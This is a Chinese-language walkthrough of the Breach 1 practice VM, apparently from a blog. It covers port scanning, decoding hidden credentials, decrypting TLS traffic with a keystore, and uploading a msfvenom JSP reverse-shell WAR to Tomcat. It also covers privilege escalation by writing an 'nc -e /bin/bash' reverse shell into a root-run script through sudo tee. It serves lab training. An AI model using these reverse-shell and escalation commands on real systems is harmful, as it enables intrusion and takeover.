breach1靶机攻略

breach1

准备

这个靶机ip固定为 192.168.110.140

使用vmware的话,将它加入一张仅主机的网卡就行,比如vmnet7,然后vmnet设置成192.168.110.0网段,kali也新建一张网卡加入该网卡

扫描

nmap --min-rate 10000 -p- 192.168.110.140

快速扫描端口开放情况

会发现这个靶机全端口开放

image-20231105212541520

渗透

访问80端口即页面试试

可以访问

在这里插入图片描述

主页的翻译

Initech被入侵,董事会投票决定引入内部的Initech网络咨询,LLP部门来协助。鉴于此次入侵事件的高知名度和几乎灾难性的损失,随后出现了许多针对该公司的攻击。Initech已经委托了他们的顶级顾问,由Bill Lumbergh, CISSP和Peter Gibbons, cb| EH, SEC+, NET+, A+领导,对漏洞进行控制和分析。

该公司几乎没有意识到,这次入侵并不是熟练的黑客所为,而是一名心怀不满的前雇员离职时留下的临别礼物。TOP咨询公司一直在努力遏制这一漏洞。然而,他们自己的职业道德和留下的烂摊子可能是公司垮台的原因。

f12查看源码

发现一条疑似密文的内容

Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo

image-20231105213102528

拿去base64解码一下

image-20231105213244123

pgibbons:damnitfeel$goodtobeagang$ta

得到内容疑似账号密码

除此之外,网页图片点击会跳转

image-20231105213343997

第四个这里有登录框,同时能看到cms类型

image-20231105213408699

拿刚才的账号密码试一下

登录成功

image-20231105213443715

游荡到信息页,发现了提示

image-20231105213936338

访问一下,下载了这个keystore文件,keystore是存储公私密钥的一种文件格式

接着游荡,此处点击content发现ssl相关的链接

image-20231105214256025image-20231105214323661

点击即可下载

并且该句话提示所有ssl相关密码都为tomcat

使用wireshark查看一下流量包文件

wireshark _SSL_test_phase1.pcap

image-20231105215339373

发现该流量包内容加密

某歌搜索一下keystore用法

image-20231105215950487

修改一下参数

keytool -importkeystore -srckeystore keystore -destkeystore keystore.p12 -srcstoretype jks -deststoretype pkcs12

image-20231105220134331

中间密码部分输入的都是tomcat

出现.p12后缀文件

image-20231105220220083

使用wireshark打开刚才那个流量包

然后编辑-首选项

image-20231105220426830

在protocols找到ssl或者tls

image-20231105220506878

找到一个tls的看看端口多少

image-20231105220702720

此处为8443

如图配置

image-20231105220942804

文件选择刚生成的.p12文件

发现解密了,追踪一下tls的流

image-20231105221045677

在请求信息中得到一串登录信息

image-20231105221456390

tomcat:Tt\5D8F(#!*u=G)4m7zB

此处需要使用bp抓包然后勾选https请求,放包访问才能成功访问

image-20231105223115707

随后登录框账户信息为刚才base64那一串,因为wireshark看到返回值是200

反复放包成功登录tomcat后台

image-20231105223214481

使用msf生成一个war

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.110.128 LPORT=4444 -f war > test.war

image-20231105224141183

同样需要bp每一步https上传成功,msf打开监听,然后访问一下

msf监听到

python -c 'import pty;pty.spawn("/bin/bash")'

image-20231106162030260

在var下发现两个php文件

image-20231106162501014

是个配置文件,好像不用密码可以登录数据库

image-20231106162556922

mysql用户表里有milton的登录信息

image-20231106163024103

milton:6450d89bd3aff1d893b85d3ad65d2ec2

拿去md5解密

milton:thelaststraw

可以成功切换到milton用户

passwd文件可以看到能登录的用户有个bluebergh

image-20231106163954005

并且备注提示bill lumbergh

在html里看到了bill这张图

image-20231106164038422

python3 -m http.server 6789

下载图片字符串类型查看

strings bill.png

image-20231106171541695

得到密码

blumbergh:coffeestains

提权

sudo -l查看权限操作

image-20231106171719668

echo "nc -e /bin/bash 192.168.110.128 7989" > shell.txt

cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh

tidyup.sh只有root可写,但是可以以root身份执行tee,那就用tee写入反弹shell

过了一会成功获取root

image-20231106172505751

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值